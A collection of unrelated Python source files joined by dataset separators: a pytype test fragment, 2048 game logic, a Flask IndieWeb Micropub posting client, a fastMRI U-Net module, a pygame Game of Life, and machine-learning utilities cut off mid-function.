self.assertListEqual(["convert", "generate_matches", "type_repr"],
[f.name for f in ast.functions])
self.assertListEqual(
["Base", "BasePattern", "Leaf", "LeafPattern", "NegatedPattern", "Node",
"NodePattern", "WildcardPattern"],
[c.name for c in ast.classes])
def testNoAnalyzeAnnotated(self):
filename = self._MakePyFile("""\
def f() -> str:
return 42
""")
self._InferTypesAndCheckErrors(self._DataPath(filename), [])
def testAnalyzeAnnotated(self):
filename = self._MakePyFile("""\
def f() -> str:
return 42
""")
self.pytype_args["--analyze-annotated"] = self.INCLUDE
self._InferTypesAndCheckErrors(self._DataPath(filename),
["bad-return-type"])
def testRunPytype(self):
"""Basic unit test (smoke test) for _run_pytype."""
# TODO(kramm): This is a unit test, whereas all other tests in this file
# are integration tests. Move this somewhere else?
infile = self._TmpPath("input")
outfile = self._TmpPath("output")
with open(infile, "w") as f:
f.write("def f(x): pass")
argv = ["-o", outfile, infile]
options = config.Options(argv)
main_module._run_pytype(options)
self.assertTrue(os.path.isfile(outfile))
def testGenerateAndUseBuiltins(self):
"""Test for --generate-builtins."""
filename = self._TmpPath("builtins.pickle")
# Generate builtins pickle
self.pytype_args["--generate-builtins"] = filename
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertTrue(os.path.isfile(filename))
src = self._MakePyFile("""\
import __future__
import sys
import collections
import typing
""")
# Use builtins pickle
self._ResetPytypeArgs()
self._SetUpChecking(src)
self.pytype_args["--precompiled-builtins"] = filename
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testUseBuiltinsAndImportMap(self):
"""Test for --generate-builtins."""
filename = self._TmpPath("builtins.pickle")
# Generate builtins pickle
self.pytype_args["--generate-builtins"] = filename
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertTrue(os.path.isfile(filename))
# input files
canary = "import pytypecanary" if typeshed.Typeshed.MISSING_FILE else ""
src = self._MakePyFile("""\
import __future__
import sys
import collections
import typing
import foo
import csv
import ctypes
import xml.etree.ElementTree as ElementTree
import md5
%s
x = foo.x
y = csv.writer
z = md5.new
""" % canary)
pyi = self._MakeFile("""\
import datetime
x = ... # type: datetime.tzinfo
""", extension=".pyi")
# Use builtins pickle with an imports map
self._ResetPytypeArgs()
self._SetUpChecking(src)
self.pytype_args["--precompiled-builtins"] = filename
self.pytype_args["--imports_info"] = self._MakeFile("""\
typing /dev/null
foo %s
""" % pyi, extension="")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testBuiltinsDeterminism2(self):
f1, f2 = self._GenerateBuiltinsTwice("2.7")
self.assertBuiltinsPickleEqual(f1, f2)
def testBuiltinsDeterminism3(self):
f1, f2 = self._GenerateBuiltinsTwice("3.6")
self.assertBuiltinsPickleEqual(f1, f2)
def testTimeout(self):
# Note: At the time of this writing, pickling builtins takes well over one
# second (~10s). If it ever was to get faster, this test would become flaky.
self.pytype_args["--timeout"] = 1
self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.pickle")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=True)
def main():
unittest.main()
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import argparse
def main(args):
"""
This is some doc
"""
print(args)
def sub_function():
"""
Here is some doc about this sub function
"""
pass
def parse_arguments():
parser = argparse.ArgumentParser(description="")
parser.add_argument("-t", "--type", default=False)
return parser.parse_args()
if __name__ == "__main__":
args = parse_arguments()
main(args)
|
nilq/baby-python
|
python
|
while (True):
print("mohammed uddin made changes")
print(":D")
|
nilq/baby-python
|
python
|
# logic.py to be
import random
global actual_score
def start_game():
# declaring an empty list then
# appending 4 list each with four
# elements as 0.
mat = []
for i in range(4):
mat.append([0] * 4)
# calling the function to add
# a new 2 in grid after every step
add_new_2(mat)
return mat
# function to add a new 2 in
# grid at any random empty cell
def add_new_2(mat):
# choosing a random index for
# row and column.
r = random.randint(0, 3)
c = random.randint(0, 3)
counter = 0
# while loop will break as the
# random cell chosen will be empty
# (or contains zero)
while ((mat[r][c] != 0) & (counter<50)):
r = random.randint(0, 3)
c = random.randint(0, 3)
counter = counter + 1
# we will place a 2 at that empty
# random cell.
if counter < 50:
mat[r][c] = 2
return mat
# function to get the current
# state of game
def get_current_state(mat):
# if any cell contains
# 2048 we have won
for i in range(4):
for j in range(4):
if (mat[i][j] == 2048):
return 'WON'
# if we are still left with
# atleast one empty cell
# game is not yet over
for i in range(4):
for j in range(4):
if (mat[i][j] == 0):
return 'GAME NOT OVER'
# or if no cell is empty now
# but if after any move left, right,
# up or down, if any two cells
# gets merged and create an empty
# cell then also game is not yet over
for i in range(3):
for j in range(3):
if (mat[i][j] == mat[i + 1][j] or mat[i][j] == mat[i][j + 1]):
return 'GAME NOT OVER'
for j in range(3):
if (mat[3][j] == mat[3][j + 1]):
return 'GAME NOT OVER'
for i in range(3):
if (mat[i][3] == mat[i + 1][3]):
return 'GAME NOT OVER'
# else we have lost the game
return 'LOST'
# all the functions defined below
# are for left swap initially.
# function to compress the grid
# after every step before and
# after merging cells.
def compress(mat):
# bool variable to determine
# any change happened or not
changed = False
# empty grid
new_mat = []
# with all cells empty
for i in range(4):
new_mat.append([0] * 4)
# here we will shift entries
# of each cell to it's extreme
# left row by row
# loop to traverse rows
for i in range(4):
pos = 0
# loop to traverse each column
# in respective row
for j in range(4):
if (mat[i][j] != 0):
# if cell is non empty then
# we will shift it's number to
# previous empty cell in that row
# denoted by pos variable
new_mat[i][pos] = mat[i][j]
if (j != pos):
changed = True
pos += 1
# returning new compressed matrix
# and the flag variable.
return new_mat, changed
# function to merge the cells
# in matrix after compressing
def merge(mat):
changed = False
score = 0
for i in range(4):
for j in range(3):
# if current cell has same value as
# next cell in the row and they
# are non empty then
if (mat[i][j] == mat[i][j + 1] and mat[i][j] != 0):
# double current cell value and
# empty the next cell
mat[i][j] = mat[i][j] * 2
mat[i][j + 1] = 0
score = mat[i][j] + score
# make bool variable True indicating
# the new grid after merging is
# different.
changed = True
#actual_score = score
return mat, changed, score
# function to reverse the matrix
# means reversing the content of
# each row (reversing the sequence)
def reverse(mat):
new_mat = []
for i in range(4):
new_mat.append([])
for j in range(4):
new_mat[i].append(mat[i][3 - j])
return new_mat
# function to get the transpose
# of matrix means interchanging
# rows and column
def transpose(mat):
new_mat = []
for i in range(4):
new_mat.append([])
for j in range(4):
new_mat[i].append(mat[j][i])
return new_mat
# function to update the matrix
# if we move / swipe left
def move_left(grid):
# first compress the grid
new_grid, changed1 = compress(grid)
# then merge the cells.
new_grid, changed2, score = merge(new_grid)
changed = changed1 or changed2
# again compress after merging.
new_grid, temp = compress(new_grid)
# return new matrix and bool changed
# telling whether the grid is same
# or different
return new_grid, changed, score
# function to update the matrix
# if we move / swipe right
def move_right(grid):
# to move right we just reverse
# the matrix
new_grid = reverse(grid)
# then move left
new_grid, changed, score = move_left(new_grid)
# then again reverse matrix will
# give us desired result
new_grid = reverse(new_grid)
return new_grid, changed, score
# function to update the matrix
# if we move / swipe up
def move_up(grid):
# to move up we just take
# transpose of matrix
new_grid = transpose(grid)
# then move left (calling all
# included functions) then
new_grid, changed, score = move_left(new_grid)
# again take transpose will give
# desired results
new_grid = transpose(new_grid)
return new_grid, changed, score
# function to update the matrix
# if we move / swipe down
def move_down(grid):
# to move down we take transpose
new_grid = transpose(grid)
# move right and then again
new_grid, changed, score = move_right(new_grid)
# take transpose will give desired
# results.
new_grid = transpose(new_grid)
return new_grid, changed, score
# this file only contains all the logic
# functions to be called in main function
# present in the other file
|
nilq/baby-python
|
python
|
import os
from flask import request, render_template, redirect, session, Blueprint, flash, jsonify, abort, send_from_directory
from werkzeug.utils import secure_filename
import indieweb_utils
from bs4 import BeautifulSoup
import requests
from config import ENDPOINT_URL, TWITTER_BEARER_TOKEN, UPLOAD_FOLDER, MEDIA_ENDPOINT_URL, CLIENT_ID
client = Blueprint("client", __name__, static_folder="static", static_url_path="")
@client.route("/", methods=["GET", "POST"])
def index():
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
else:
user = None
me = None
if request.method == "POST":
if user:
url = request.form["url"]
if request.form["action"] == "update":
return redirect(f"/update?url={url}")
elif request.form["action"] == "delete":
if session.get("scope") and not "delete" in session.get("scope").split(" "):
flash("You do not have permission to update posts.")
return redirect("/")
http_request = requests.post(
ENDPOINT_URL,
json={
"type": ["h-entry"],
"action": "delete",
"url": url
},
headers={
"Authorization": f"Bearer {user}"
}
)
if http_request.status_code == 200 or http_request.status_code == 201:
flash(f"Your {url} post was successfully deleted.")
else:
flash(http_request.json()["message"].strip("."))
return render_template("user/dashboard.html", user=user, me=me, title="WriteIt Home", action="delete")
elif request.form["action"] == "undelete":
if session.get("scope") and not "undelete" in session.get("scope").split(" "):
flash("You do not have permission to undelete posts.")
return redirect("/")
http_request = requests.post(
ENDPOINT_URL,
json={
"type": ["h-entry"],
"action": "undelete",
"url": url
},
headers={
"Authorization": f"Bearer {user}"
}
)
if http_request.status_code == 200 or http_request.status_code == 201:
flash(f"Your {url} post was successfully undeleted.")
else:
flash(http_request.json()["message"].strip("."))
return render_template(
"user/dashboard.html",
user=user,
me=me,
title="WriteIt Home",
action="undelete"
)
return redirect("/")
abort(403)
if user is not None:
return render_template(
"user/dashboard.html",
user=user,
me=me,
title="WriteIt Dashboard",
action=None
)
else:
return render_template(
"index.html",
user=user,
me=me,
title="Home WriteIt",
action=None
)
@client.route("/post", methods=["GET", "POST"])
def create_post():
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
else:
return redirect("/login")
post_type = request.args.get("type")
request_type = None
accepted_post_types = (
("like", "like-of"),
("repost", "repost-of"),
("bookmark", "bookmark-of"),
("rsvp", "rsvp"),
("reply", "in-reply-to"),
("checkin", ""),
("checkin", ""),
("photo", ""),
("watch", "")
)
for item in accepted_post_types:
post, attribute = item
if post_type == post:
title = f"Create a {post.title()} Post"
url = request.args.get(attribute)
request_type = attribute
if post_type == "photo" and "media" not in session.get("scope").split(" "):
flash("You need to grant the 'media' scope to upload photos.")
return redirect("/")
if request.method == "POST":
form_encoded = request.form.to_dict()
if form_encoded.get("access_token"):
del form_encoded["access_token"]
if request.form.get("preview") and not request.form.get("in-reply-to"):
post_type = None
if request.form.get("like-of"):
return redirect(f"/post?type=like&like-of={request.form.get('like-of')}&is_previewing=true")
if request.form.get("bookmark-of"):
return redirect(f"/post?type=bookmark&bookmark-of={request.form.get('bookmark-of')}&is_previewing=true")
if request.form.get("repost-of"):
return redirect(f"/post?type=repost&repost-of={request.form.get('repost-of')}&is_previewing=true")
if me and user:
data = {
"type": ["h-entry"],
"properties": {}
}
form_types = ["in-reply-to", "like-of", "repost-of", "bookmark-of", "watch-of"]
for key in form_encoded:
if key in form_types:
del form_encoded["h"]
del form_encoded["action"]
data["properties"][key] = [form_encoded]
url = form_encoded[key]
request_type = key
break
if request.form.get("syndication") and request.form.get("syndication") != "none":
data["syndication"] = [request.form.get("syndication")]
if request.form.get("category") == "RSVP":
data["p-rsvp"] = {}
data["p-rsvp"]["properties"] = {
"event_name": request.form.get("event_name"),
"in-reply-to": request.form.get("in-reply-to"),
"state": request.form.get("state"),
"content": [request.form.get("content")],
"event_date": request.form.get("event_date"),
"event_time": request.form.get("event_time")
}
elif request.form.get("venue_name"):
data["properties"] = {"checkin": [{"properties": {}}]}
data["properties"] = {
"checkin": [
{
"properties": {
"name": request.form.get("venue_name"),
"latitude": request.form.get("latitude"),
"longitude": request.form.get("longitude")
}
}
]
}
if request.form.get("content"):
data["properties"]["checkin"][0]["properties"]["content"] = [request.form.get("content")]
if not request.form.get("venue_name") or not request.form.get("latitude") or not request.form.get("longitude"):
flash("Please enter a valid venue name, latitude, and longitude value.")
return render_template("post/create_post.html", title=title, post_type=post_type, user=user, me=me)
else:
if request.form.get("title"):
data["properties"]["title"] = [request.form.get("title")]
if request.form.get("content"):
data["properties"]["content"] = [request.form.get("content")]
if request.form.get("category"):
data["properties"]["category"] = request.form.get("category").split(", ")
if request.form.get("is_hidden"):
data["properties"]["is_hidden"] = [request.form.get("is_hidden")]
if request.form.get("content") and BeautifulSoup(request.form.get("content"), "lxml") and BeautifulSoup(request.form.get("content"), "lxml").find():
data["properties"]["content"] = [{"html": request.form.get("content")}]
elif request.form.get("content") and request.form.get("content") is not None:
data["properties"]["content"] = [request.form.get("content")]
photo = request.files.get("photo")
if photo:
photo.save(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)))
# if session.get("config"):
# photo_r = requests.post(session["config"]["media-endpoint"], files={"file": (secure_filename(photo.filename),open(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)), "rb"), 'image/jpeg')}, headers={"Authorization": "Bearer " + user})
# else:
photo_http_request = requests.post(
MEDIA_ENDPOINT_URL,
files={
"file": (
secure_filename(photo.filename),
open(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)), "rb"),
'image/jpeg'
)
},
headers={
"Authorization": "Bearer " + user
}
)
check_for_alt_text = False
if photo:
data["properties"]["photo"] = [{ "value": photo_http_request.headers["Location"] }]
check_for_alt_text = True
if check_for_alt_text and request.form.get("image_alt_text"):
data["properties"]["photo"][0]["alt"] = request.form.get("image_alt_text")
if request.form.get("format") == "form_encoded":
form_encoded["h"] = "entry"
categories = []
if form_encoded.get("category") and len(form_encoded.get("category").split(", ")) > 0:
for i in form_encoded.get("category").replace(", ", ",").split(","):
categories += [i]
form_encoded["category[]"] = categories
http_request = requests.post(ENDPOINT_URL, data=form_encoded, headers={"Authorization": f"Bearer {user}"})
else:
http_request = requests.post(ENDPOINT_URL, json=data, headers={"Authorization": f"Bearer {user}"})
try:
response = http_request.json()["message"]
except:
response = http_request.text
if http_request.status_code != 200 and http_request.status_code != 201:
flash("Error: " + str(response))
if http_request.headers.get("Location"):
return redirect(http_request.headers["Location"])
flash("Your post was successfully created.")
title = "Create Post"
return render_template("post/create_post.html", title=title, post_type=post_type, user=user, me=me)
return jsonify({"error": "You must be logged in to create a post."}), 401
if request_type is not None and url:
site_supports_webmention, h_entry = indieweb_utils.get_reply_context(url, twitter_bearer_token=TWITTER_BEARER_TOKEN)
else:
h_entry = None
site_supports_webmention = False
is_previewing = False
if request.args.get("is_previewing") and request.args.get("is_previewing") == "true":
is_previewing = True
return render_template(
"post/create_post.html",
title=title,
post_type=post_type,
user=user,
me=me,
url=url,
h_entry=h_entry,
site_supports_webmention=site_supports_webmention,
is_previewing=is_previewing
)
@client.route("/update", methods=["GET", "POST"])
def update_post():
post_id = request.args.get("url")
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
else:
return redirect("/login")
if session.get("scope") and not "update" in session.get("scope").split(" "):
flash("You do not have permission to update posts.")
return redirect("/")
if "/checkin/" in post_id:
post_type = "checkin"
elif "/rsvp/" in post_id:
post_type = "rsvp"
elif "/webmentions/" in post_id:
post_type = "reply"
else:
post_type = "note"
try:
properties = requests.get(ENDPOINT_URL + "?q=source&url=" + post_id,
headers={"Authorization": f"Bearer {user}"})
properties = properties.json()
except:
abort(404)
title = "Update a Post"
if request.method == "POST":
if me and user:
data = {
"action": "update",
"url": post_id,
"replace": {}
}
if request.form.get("title"):
data["replace"]["title"] = [request.form.get("title")]
else:
data["replace"]["title"] = ""
if request.form.get("content"):
data["replace"]["content"] = [request.form.get("content")]
else:
data["replace"]["content"] = []
if request.form.get("image_alt_text"):
data["replace"]["image_alt_text"] = request.form.get("image_alt_text")
else:
data["replace"]["image_alt_text"] = ""
if request.form.get("category"):
data["replace"]["category"] = request.form.get("category")
if request.form.get("is_hidden"):
data["replace"]["is_hidden"] = [request.form.get("is_hidden")]
if post_type == "rsvp":
data["p-rsvp"] = {}
data["p-rsvp"]["properties"] = {
"in-reply-to": properties["properties"]["in-reply-to"],
"rsvp": request.form.get("rsvp"),
"state": request.form.get("state"),
"content": [request.form.get("content")],
"event_date": request.form.get("event_date"),
"event_time": request.form.get("event_time")
}
elif request.form.get("in-reply-to"):
data["in-reply-to"] = request.form.get("in-reply-to")
http_request = requests.post(ENDPOINT_URL, json=data, headers={
"Authorization": f"Bearer {user}", "Content-Type": "application/json"
})
try:
response = http_request.json()
if http_request.status_code != 200 and http_request.status_code != 201:
flash("Error: " + str(response["message"]))
else:
return redirect(http_request.headers["Location"])
except:
flash("There was an unknown server errohttp_request.")
return render_template(
"post/update_post.html",
title=title,
post_type=post_type,
user=user, me=me,
id=post_id,
properties=properties
)
return jsonify({"error": "You must be logged in to create a post."}), 401
return render_template(
"post/update_post.html",
title=title,
post_type=post_type,
user=user, me=me,
id=id,
properties=properties
)
@client.route("/settings")
def settings():
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
if session.get("syndication"):
syndication = session["syndication"]
else:
syndication = None
else:
return redirect("/login")
client_id = CLIENT_ID.strip("/")
return render_template(
"user/settings.html",
title="Settings",
user=user,
me=me,
syndication=syndication,
client_id=client_id
)
@client.route("/schemas")
def schemas():
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
else:
return redirect("/login")
return render_template(
"user/schemas.html",
title="Schemas",
user=user,
me=me
)
# use this to forward client-side uploads from /post?type=photo to the /media micropub endpoint
@client.route("/media-forward", methods=["POST"])
def forward_media_query():
if not session.get("access_token"):
return redirect("/login")
photo = request.files.get("photo")
if not photo:
flash("No photo was uploaded. Please upload a photo and try again.")
return redirect("/post?type=photo")
if not session.get("access_token"):
return jsonify({"error": "You must be logged in to upload a photo."}), 401
if request.form.get("filename"):
filename = secure_filename(request.form.get("filename").replace("..", ""))
else:
filename = secure_filename(photo.filename.replace("..", ""))
photo.save(os.path.join(UPLOAD_FOLDER, filename))
http_request = requests.post(
MEDIA_ENDPOINT_URL,
files={
"file": (
filename,
open(os.path.join(UPLOAD_FOLDER, filename), "rb"),
'image/jpeg'
)
},
headers={
"Authorization": f"Bearer {session['access_token']}"
}
)
if http_request.status_code != 201:
flash("Error: " + str(http_request.json()["message"]))
return redirect("/post?type=photo")
location_header = http_request.headers["Location"]
return redirect(location_header)
@client.route("/robots.txt")
def robots():
return send_from_directory(client.static_folder, "robots.txt")
@client.route("/favicon.ico")
def favicon():
return send_from_directory(client.static_folder, "favicon.ico")
@client.route("/emojis.json")
def emojis():
return send_from_directory(client.static_folder, "emojis.json")
@client.route("/manifest.json")
def web_app_manifest():
return send_from_directory("static", "manifest.json")
@client.route("/emoji_autocomplete.js")
def emoji_autocomplete():
return send_from_directory(client.static_folder, "js/emoji_autocomplete.js")
|
nilq/baby-python
|
python
|
"""Docstring for varnet.py
Normalized U-Net implemetnation for unrolled block network.
"""
import math
from typing import List, Tuple
import fastmri
import torch
import torch.nn as nn
import torch.nn.functional as F
from fastmri.data import transforms
from unet import MHUnet
from att_unet import AttUnet
class NormUnet(nn.Module):
"""PyTorch implementation of a Normalized U-Net model.
This is the same as a regular U-Net, but with normalization applied to the
input before the U-Net. This keeps the values more numerically stable
during training.
Initialization Parameters
-------------------------
chans : int
Number of output channels of the first convolution layer.
num_pools : int
Number of down-sampling and up-sampling layers.
in_chans : int
Number of channels in the input to the U-Net model.
out_chans : int
Number of channels in the output to the U-Net model.
drop_prob : float
Dropout probability.
which_unet : str
One of [trueshare, mhushare, attenshare, split]
task_count : int
Number of dataset tasks
Forward Parameters
------------------
image : tensor
4D tensor
int_task : int
i.e. 0 for div_coronal_pd_fs, 1 for div_coronal_pd
Returns
-------
4D tensor
References
----------
https://github.com/facebookresearch/fastMRI/tree/master/fastmri/models
"""
def __init__(
self,
chans: int,
num_pools: int,
in_chans: int = 2,
out_chans: int = 2,
drop_prob: float = 0.0,
which_unet: str = 'user input required',
task_count: int = None,
):
super().__init__()
assert which_unet in ['trueshare', 'mhushare', 'attenshare', 'split'], "variable which_unet not supported"
if which_unet == 'trueshare' or which_unet == 'split':
decoder_heads = 1
elif which_unet == 'mhushare' or which_unet == 'attenshare':
assert task_count > 1, 'no. tasks must be int > 1 for mhu or att unet'
decoder_heads = task_count
# attentional network is a separate module
if which_unet == 'attenshare':
self.unet = AttUnet(
in_chans = in_chans,
out_chans = out_chans,
chans = chans,
num_pool_layers = num_pools,
drop_prob = drop_prob,
decoder_heads = decoder_heads,
)
# trueshare, mhushare, and split all use the same network
# Differentiation between the three happens in MHUnet or VarNet_MTL
else:
self.unet = MHUnet(
in_chans = in_chans,
out_chans = out_chans,
chans = chans,
num_pool_layers = num_pools,
drop_prob = drop_prob,
decoder_heads = decoder_heads,
)
def complex_to_chan_dim(self, x: torch.Tensor) -> torch.Tensor:
b, c, h, w, two = x.shape
assert two == 2
return x.permute(0, 4, 1, 2, 3).reshape(b, 2 * c, h, w)
def chan_complex_to_last_dim(self, x: torch.Tensor) -> torch.Tensor:
b, c2, h, w = x.shape
assert c2 % 2 == 0
c = c2 // 2
return x.view(b, 2, c, h, w).permute(0, 2, 3, 4, 1).contiguous()
def norm(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
# group norm
b, c, h, w = x.shape
x = x.view(b, 2, c // 2 * h * w)
mean = x.mean(dim=2).view(b, c, 1, 1)
std = x.std(dim=2).view(b, c, 1, 1)
x = x.view(b, c, h, w)
return (x - mean) / std, mean, std
def unnorm(
self, x: torch.Tensor, mean: torch.Tensor, std: torch.Tensor
) -> torch.Tensor:
return x * std + mean
def pad(
self, x: torch.Tensor
) -> Tuple[torch.Tensor, Tuple[List[int], List[int], int, int]]:
"""Ensure that dimensions match after rounding errors incurred
during upsampling/downsampling by padding.
"""
_, _, h, w = x.shape
w_mult = ((w - 1) | 15) + 1
h_mult = ((h - 1) | 15) + 1
w_pad = [math.floor((w_mult - w) / 2), math.ceil((w_mult - w) / 2)]
h_pad = [math.floor((h_mult - h) / 2), math.ceil((h_mult - h) / 2)]
# TODO: fix this type when PyTorch fixes theirs
# the documentation lies - this actually takes a list
# https://github.com/pytorch/pytorch/blob/master/torch/nn/functional.py#L3457
# https://github.com/pytorch/pytorch/pull/16949
x = F.pad(x, w_pad + h_pad)
return x, (h_pad, w_pad, h_mult, w_mult)
def unpad(
self,
x: torch.Tensor,
h_pad: List[int],
w_pad: List[int],
h_mult: int,
w_mult: int,
) -> torch.Tensor:
return x[..., h_pad[0] : h_mult - h_pad[1], w_pad[0] : w_mult - w_pad[1]]
def forward(
self,
x: torch.Tensor,
int_task: int = 0,
) -> torch.Tensor:
if not x.shape[-1] == 2:
raise ValueError("Last dimension must be 2 for complex.")
# get shapes for unet and normalize
x = self.complex_to_chan_dim(x)
x, mean, std = self.norm(x)
x, pad_sizes = self.pad(x)
x = self.unet(
x, int_task = int_task,
)
# get shapes back and unnormalize
x = self.unpad(x, *pad_sizes)
x = self.unnorm(x, mean, std)
x = self.chan_complex_to_last_dim(x)
return x
|
nilq/baby-python
|
python
|
import pygame
import numpy as np
from time import sleep
class GameOfLife:
def __init__(self):
pygame.init()
self.size = 800
self.divisions = 100
self.length = self.size // self.divisions
self.screen = pygame.display.set_mode((self.size, self.size))
self.fps = 120
self.interval = 10
self.counter = 0
self.color_bg = (25, 25, 25)
self.color_fg = (230, 230, 230)
self.cells = np.full((self.divisions, self.divisions), False, dtype=bool)
self.paused = False
def play(self):
clock = pygame.time.Clock()
self.draw()
pygame.display.update()
while True:
self.counter += 1
clock.tick(self.fps)
self.draw()
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
quit()
keys = pygame.key.get_pressed()
if keys[pygame.K_ESCAPE]:
self.paused = not self.paused
self.draw()
pygame.display.update()
sleep(0.2)
if self.paused:
if pygame.mouse.get_pressed()[0]:
pos = pygame.mouse.get_pos()
pos = [pos[0] // self.length, pos[1] // self.length]
self.cells[pos[0], pos[1]] = not self.cells[pos[0], pos[1]]
continue
if self.counter % (self.fps // self.interval) == 0:
neighbors_count = np.full((self.divisions + 2, self.divisions + 2), 0, dtype=np.int8)
for i in range(self.divisions):
for j in range(self.divisions):
if self.cells[i, j]:
for i2 in range(i, i+3):
for j2 in range(j, j+3):
neighbors_count[i2, j2] += 1
neighbors_count[i+1, j+1] -= 1
for i in range(self.divisions):
for j in range(self.divisions):
if self.cells[i, j]:
if neighbors_count[i+1, j+1] not in {2, 3}:
self.cells[i, j] = False
else:
if neighbors_count[i+1, j+1] == 3:
self.cells[i, j] = True
def draw(self):
pygame.draw.rect(
self.screen,
self.color_bg,
pygame.Rect(0, 0, self.size, self.size)
)
for i in range(self.divisions):
for j in range(self.divisions):
if self.cells[i, j]:
pygame.draw.rect(
self.screen,
self.color_fg,
pygame.Rect(i * self.length, j * self.length, self.length, self.length)
)
if __name__ == "__main__":
obj = GameOfLife()
obj.play()
|
nilq/baby-python
|
python
|
import numpy as np
import torch
import torchvision
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from sklearn.manifold import TSNE
import os
from .model import resnet
from PIL import ImageFilter
import random
def adjust_learning_rate(args, optimizer, epoch, lr):
# if args.cosine:
# eta_min = lr * (args.lr_decay_rate ** 3)
# lr = eta_min + (lr - eta_min) * (
# 1 + math.cos(math.pi * epoch / args.epochs)) / 2
# else:
steps = np.sum(epoch > np.asarray(args.lr_decay_epochs))
if steps > 0:
lr = lr * (args.lr_decay_rate ** steps)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def ERG(arr, k=2):
arr_clone = arr.copy()
arr_sum = arr_clone.sum(axis=0)
index = np.argsort(arr_sum)[-k:]
for i in index:
arr_clone[i] = 0
arr_clone[:, i] = 0
arr_sum = arr_clone.sum(axis=0)
return arr_sum.argmax(), index
def get_tsne_feature(model, loader, device, opt):
model.eval()
with torch.no_grad():
for idx, (image, label, room_name, image_name) in enumerate(loader):
if torch.cuda.is_available():
image = image.to(device)
label = label.to(device)
if opt.mode == 'label':
feat, _ = model(image)
elif opt.mode == 'self':
feat, _ = model(image)
feat = feat.detach().cpu().numpy()
label = label.cpu().numpy()
room_name = np.array(room_name)
image_name = np.array(image_name)
sim = np.matmul(feat, feat.T)
np.fill_diagonal(sim, 0)
index = sim.sum(axis=0).argmax()
new_index, ex = ERG(sim, 3)
print(image_name[index], image_name[new_index])
print(image_name[ex])
if idx == 0:
tsne_data = feat
tsne_label = label
tsne_room_name = room_name
tsne_image_name = image_name
else:
tsne_data = np.concatenate((tsne_data, feat), axis=0)
tsne_label = np.concatenate((tsne_label, label), axis=0)
tsne_room_name = np.concatenate((tsne_room_name, room_name), axis=0)
tsne_image_name = np.concatenate((tsne_image_name, image_name), axis=0)
return tsne_data, tsne_label, tsne_room_name, tsne_image_name
def plot_tsne(data, label, room_name, image_name):
cm = plt.get_cmap('gist_rainbow')
NUM_COLORS = 2
color = [cm(1. * i / NUM_COLORS) for i in range(NUM_COLORS)]
tsne = TSNE(n_components=2, random_state=0)
data = tsne.fit_transform(data)
# room = ['FloorPlan26', 'FloorPlan227', 'FloorPlan328', 'FloorPlan429', 'FloorPlan30']
kitchen_room = ['FloorPlan26', 'FloorPlan27', 'FloorPlan28', 'FloorPlan29', 'FloorPlan30']
living_room = ['FloorPlan226', 'FloorPlan227', 'FloorPlan228', 'FloorPlan229', 'FloorPlan230']
bed_room = ['FloorPlan326', 'FloorPlan327', 'FloorPlan328', 'FloorPlan329', 'FloorPlan330']
bath_room = ['FloorPlan426', 'FloorPlan427', 'FloorPlan428', 'FloorPlan429', 'FloorPlan430']
# room = []
# room.append(random.sample(kitchen_room, 1))
# room.append(random.sample(living_room, 1))
# room.append(random.sample(bed_room, 1))
# room.append(random.sample(bath_room, 1))
total_room = ['FloorPlan26', 'FloorPlan27', 'FloorPlan28', 'FloorPlan29', 'FloorPlan30', 'FloorPlan226', 'FloorPlan227', 'FloorPlan228', 'FloorPlan229', 'FloorPlan230', 'FloorPlan326', 'FloorPlan327', 'FloorPlan328', 'FloorPlan329', 'FloorPlan330', 'FloorPlan426', 'FloorPlan427', 'FloorPlan428', 'FloorPlan429', 'FloorPlan430']
room = random.sample(total_room, 2)
plt.figure(figsize=(12, 10))
for i in range(2):
if i == 0:
output_data = data[room_name==room[i]]
output_label = label[room_name==room[i]]
output_image_name = image_name[room_name==room[i]]
output_room_name = room_name[room_name==room[i]]
else:
output_data = np.concatenate((output_data, data[room_name==room[i]]), axis=0)
output_label = np.concatenate((output_label, label[room_name==room[i]]), axis=0)
output_image_name = np.concatenate((output_image_name, image_name[room_name==room[i]]), axis=0)
output_room_name = np.concatenate((output_room_name, room_name[room_name==room[i]]), axis=0)
plt.scatter(data[room_name==room[i], 0], data[room_name==room[i], 1], marker='.', label=room[i], c=color[i])
plt.legend()
plt.show()
return output_data, output_image_name, output_label, output_room_name
def save_model(model, optimizer, epoch, model_path):
print('==> Saving...')
if not os.path.exists(model_path):
os.makedirs(model_path)
model_out_path = "best_model.pth"
state = {
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'epoch': epoch,
}
model_out_path = os.path.join(model_path, model_out_path)
torch.save(state, model_out_path)
def set_model(opt, device):
if opt.mode == 'label':
model = resnet.resnet18(num_classes=4, opt=opt)
# model = resnet.resnet50(num_classes=4, opt=opt)
